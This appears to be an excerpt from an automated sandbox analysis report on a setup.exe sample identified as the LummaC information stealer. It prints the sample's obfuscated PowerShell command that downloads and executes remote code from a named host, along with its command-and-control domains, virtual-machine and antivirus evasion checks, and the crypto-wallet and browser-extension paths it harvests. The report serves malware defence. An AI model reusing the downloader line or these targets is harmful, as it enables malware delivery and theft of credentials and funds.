              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: setup.exeStatic file information: File size 74584760 > 1048576

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; -Jump to behavior
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF96 pushfd ; iretd 0_3_03E6CF9D
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF9E pushfd ; iretd 0_3_03E6CFA1
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF62 pushad ; iretd 0_3_03E6CF65
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF4E push esp; iretd 0_3_03E6CF55
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF56 push esp; iretd 0_3_03E6CF59
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6CF5A pushad ; iretd 0_3_03E6CF61
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_03E6A41A push esp; ret 0_3_03E6A41B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_008D7C47 push FFFFFFB8h; retf 0_3_008D7C4A
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_008D7C47 push FFFFFFB8h; retf 0_3_008D7C4A
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0086E7A5 push ds; retf 0_3_0086E7E9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0086E3E5 pushfd ; retf 0_3_0086E3F9
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0086E6E2 push es; retf 0_3_0086E729
              Source: C:\Users\user\Desktop\setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\setup.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2438Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1300Jump to behavior
              Source: C:\Users\user\Desktop\setup.exe TID: 7188Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\setup.exe TID: 7200Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420Thread sleep count: 2438 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep count: 1300 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~5
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000087C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1417555343.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507819882.000000000084E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.1508611151.000000000084F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1376392754.0000000000888000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1507529583.000000000084D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: setup.exe, 00000000.00000003.1388965042.0000000003EB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: setup.exe, 00000000.00000002.1509456386.0000000003190000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: fairiespar.cyou
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; -
              Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; -Jump to behavior
              Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: setup.exe, 00000000.00000003.1429618782.00000000008DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: setup.exe PID: 5916, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: setup.exeString found in binary or memory: Jaxx Liberty
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: setup.exe, 00000000.00000003.1417555343.0000000000872000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520}
              Source: setup.exeString found in binary or memory: Wallets/Exodus
              Source: setup.exe, 00000000.00000002.1508611151.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: setup.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: setup.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
